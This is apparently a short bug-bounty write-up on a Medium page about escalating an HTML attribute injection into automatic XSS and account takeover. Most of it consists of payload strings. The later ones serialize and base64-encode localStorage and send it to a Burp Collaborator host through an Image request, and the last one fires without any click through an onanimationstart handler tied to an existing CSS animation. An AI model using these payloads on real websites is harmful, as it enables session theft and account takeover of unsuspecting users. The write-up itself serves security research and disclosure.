How I managed to trigger XSS automatically to get critical account takeover

https://google.com"'/>
Broken HTML
https://google.com"onclick="alert('1')"a="
<a href="https://google.com" onclick="alert(1)" a=""> 
https://google.com"onclick="b=JSON.stringify(localStorage);c=btoa(b);i=new/**/Image;i.src='https://burpcollaborator.burpcollaborator.net?t='+c"a="
REDACTED CSS
https://google.com"onanimationstart="b=JSON.stringify(localStorage);c=btoa(b);i=new/**/Image;i.src=’https://burpcollaborator.burpcollaborator.net?t='+c"style="animation-name:Toastify__bounceOutRight
  • I put the malicious javascript code on the onanimationstart attribute.
  • I defined in tag’s style the animation found.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store